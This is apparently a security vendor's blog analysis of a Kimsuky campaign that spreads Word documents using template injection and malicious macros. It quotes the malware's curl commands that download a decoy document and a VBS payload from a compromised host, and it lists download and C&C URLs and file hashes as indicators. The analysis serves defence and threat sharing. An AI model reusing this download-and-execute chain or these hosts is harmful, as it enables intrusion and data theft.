Malware Disguised as Normal Documents (Kimsuky)

The ASEC analysis team has recently discovered that the malware introduced in the post, <Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers)>, is being distributed to broadcasting and ordinary companies as well as those in the security-related field. Identical to the malware introduced in the blog post above, all the malware documents utilize the template injection technique and download malicious word macro documents to execute themselves. The distributed filenames are as follows:

  • [kbs Sunday Diagnosis] Questionnaire.docx
  • Im ** Cover Letter.docx
  • app-planning – copy.docx
External URL found in \word\_rels\settings.xml.rels

To facilitate the execution of the malicious macro code, the threat actor used an image that prompts users to execute the macro. The image has been constantly used since the past and is suspected to be all from the same operator.

Prompting users to enable content

Below is a list of download URLS of malicious Word macro documents we have additionally identified.

  • hxxp://[.]kr/bbs/img/cmg/upload2/init.dotm
  • hxxp://[.]kr/bbs/img/cmg/upload3/init.dotm
  • hxxp://jooshineng[.]com/gnuboard4/adm/img/ghp/up/state.dotm
  • hxxp://gdtech[.]kr/gnuboard4/adm/cmg/attatch/init.dotm
  • hxxp://[.]kr/gnuboard4/adm/cmg/upload/init.dotm

When the malicious macro inside the downloaded document is executed, it generates and runs the version.bat file that contains the curl command. The batch file includes codes that download and execute a normal document and additional malicious script. The used curl commands are as follows.

  • curl -o “”” & fname & “”” hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/state.docx
  • curl -o %temp%\temp.vbs hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/list.php?query=60

Confirmed normal documents disguised themselves cover letters, application proposals, and more.

Normal document – 1
Normal document – 2
Normal document – 3

Identical to the previous findings, the additional malicious script leaks the following data to the C&C server.

  • Infected PC system information
  • Information on virus vaccines installed on the system
  • List of recently opened Word files
  • Directory information of the download folder in the system
  • Information of running processes
  • Modification of IE-related registries
  • Registration to the task scheduler to maintain a connection to the C&C server

The confirmed C&C URLs are as follows.

  • hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/show.php
  • hxxp://[.]kr/gnuboard4/adm/cmg/upload/show.php
  • hxxp://[.]kr/bbs/img/cmg/upload3/show.php

Recently, malware cases targeting North Korea-related individuals are also being distributed to ordinary corporate users, calling for their utmost precaution. Users must therefore refrain from viewing emails from unknown senders and take caution so that macros included in Office documents do not run automatically.

[File Detection]

  • Downloader/DOC.External (2023.02.03.03)
  • Downloader/DOC.Kimsuky (2023.02.07.00)


  • 55a46a2415d18093abcd59a0bf33d0a9 (docx)
  • 3cdf9f829ed03e1ac17b72b636d84d0bs (dotm)
  • 873b2b0656ee9f6912390b5abc32b276 (dotm)
  • 83b4d96fc75f74bb589c28e8a9eddbbf (dotm)
  • 705ef00224f3f7b02e29f21eb6e10d02 (dotm)
  • hxxp://gdtech[.]kr/gnuboard4/adm/cmg/attatch/init.dotm
  • hxxp://[.]kr/gnuboard4/adm/cmg/upload/init.dotm
  • hxxp://[.]kr/bbs/img/cmg/upload2/init.dotm
  • hxxp://[.]kr/bbs/img/cmg/upload3/init.dotm
  • hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/list.php?query=60

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

5 1 vote
Article Rating
Notify of

1 Comment
Inline Feedbacks
View all comments

[…] Malware Disguised as Normal Documents (Kimsuky) – Feb 03, 2023 […]